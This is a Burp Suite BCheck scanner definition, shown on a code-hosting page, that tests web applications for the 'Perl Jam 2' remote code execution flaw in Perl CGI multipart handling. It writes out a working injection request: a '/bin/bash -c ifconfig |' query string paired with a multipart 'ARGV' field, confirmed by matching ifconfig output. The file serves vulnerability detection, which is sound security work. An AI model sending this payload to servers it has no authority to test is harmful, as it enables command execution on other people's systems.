-
Notifications
You must be signed in to change notification settings - Fork 117
/
Copy pathPerl Jam 2 - RCE.bcheck
35 lines (29 loc) · 1.5 KB
/
Perl Jam 2 - RCE.bcheck
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
metadata:
language: v2-beta
name: "Perl JAM 2"
description: "Perl JAM 2 - RCE"
author: "Andrej Šimko @ Accenture"
tags: "Perl JAM 2","Perl","Remote Code Execution","RCE"
define:
#this should potentially be changed to work on Windows deployment
rce_payload = "/bin/bash%20-c%20ifconfig%20|"
request_all_headers = `{base.request.headers}`
multi_line = `{regex_replace({request_all_headers},"[\s\S]+boundary=","")}`
boundary = `{regex_replace({multi_line},"[\r\n].*","")}`
request_original_body = `{base.request.body}`
given request then
if {base.request.method} matches "POST" and "multipart/form-data" in {base.request.headers} then
send request called RCE:
method: "POST"
replacing query_string: {rce_payload}
#our payload needs to be at the beginning of the POST body; followed by the original body
replacing body: `--{boundary}\r\nContent-Disposition: form-data; name="file"\r\n\r\nARGV\r\n`
appending body:`{request_original_body}`
if "127.0.0.1" in {RCE.response.body} and "RX packets" in {RCE.response.body} then
report issue:
severity: high
confidence: certain
detail: "The application is vulnerable to Perl Remote Code Execution. For more information, check https://www.blackhat.com/docs/asia-16/materials/asia-16-Rubin-The-Perl-Jam-2-The-Camel-Strikes-Back.pdf. All credit goes to Netanel Rubin @na7irub."
remediation: "Stop using Perl."
end if
end if